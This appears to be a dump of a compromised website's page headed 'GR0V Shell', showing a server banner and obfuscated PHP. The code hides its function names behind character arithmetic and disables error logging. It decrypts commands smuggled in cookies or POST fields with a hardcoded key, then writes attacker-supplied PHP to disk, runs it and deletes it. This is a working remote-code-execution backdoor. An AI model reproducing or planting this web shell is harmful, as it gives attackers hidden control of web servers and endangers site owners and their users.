?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $ijdbekoifq = "\x66"."\x69"."\x6c".chr(735-634).chr(1048-953)."\160".'u'.chr(310-194).chr(95)."\143".chr(637-526)."\x6e".chr(869-753).chr(325-224).chr(110)."\x74".'s';
$gfetfo = chr(98)."\141".chr(115).chr(584-483).chr(465-411).'4'.chr(95)."\144".chr(614-513).'c'.chr(910-799).chr(100)."\145";
$tapkibfn = 'i'.chr(110).chr(991-886)."\x5f"."\163".chr(781-680).'t';
$npocktd = 'u'.chr(548-438).chr(108).'i'."\x6e"."\153";
@$tapkibfn(chr(173-72)."\162"."\162".chr(111).chr(613-499).'_'.chr(166-58)."\x6f".'g', NULL);
@$tapkibfn("\x6c".chr(471-360).chr(581-478).chr(95).'e'."\162".chr(178-64).chr(111)."\x72"."\163", 0);
@$tapkibfn("\x6d"."\141"."\x78"."\137".'e'."\170"."\x65"."\x63"."\x75".chr(867-751).'i'."\x6f"."\x6e"."\x5f".chr(116)."\151".chr(109).chr(101), 0);
@set_time_limit(0);
function evseh($sevtww, $pogidawcr)
{
$dvanv = "";
for ($vrdtpeojky = 0; $vrdtpeojky < strlen($sevtww);) {
for ($j = 0; $j < strlen($pogidawcr) && $vrdtpeojky < strlen($sevtww); $j++, $vrdtpeojky++) {
$dvanv .= chr(ord($sevtww[$vrdtpeojky]) ^ ord($pogidawcr[$j]));
}
}
return $dvanv;
}
$vrdtpeojkysaeriku = array_merge($_COOKIE, $_POST);
$rqcjapf = '3e9da81f-9915-46de-899b-2e2908eaffa5';
foreach ($vrdtpeojkysaeriku as $cqxdbuu => $sevtww) {
$sevtww = @unserialize(evseh(evseh($gfetfo($sevtww), $rqcjapf), $cqxdbuu));
if (isset($sevtww["\141".'k'])) {
if ($sevtww['a'] == chr(505-400)) {
$vrdtpeojky = array(
'p'."\x76" => @phpversion(),
chr(1038-923).chr(714-596) => "3.5",
);
echo @serialize($vrdtpeojky);
} elseif ($sevtww['a'] == chr(101)) {
$pizmvbil = "./" . md5($rqcjapf) . "\x2e".chr(105).chr(694-584)."\143";
@$ijdbekoifq($pizmvbil, "<" . "\77".'p'.chr(104).'p'."\x20".'@'.chr(117)."\156".chr(638-530)."\x69".chr(110)."\153"."\50".chr(95).'_'.chr(804-734).chr(73)."\x4c"."\x45"."\x5f".'_'.chr(273-232).chr(517-458).chr(761-729) . $sevtww["\x64"]);
include($pizmvbil);
@$npocktd($pizmvbil);
}
exit();
}
}
T1KUS90T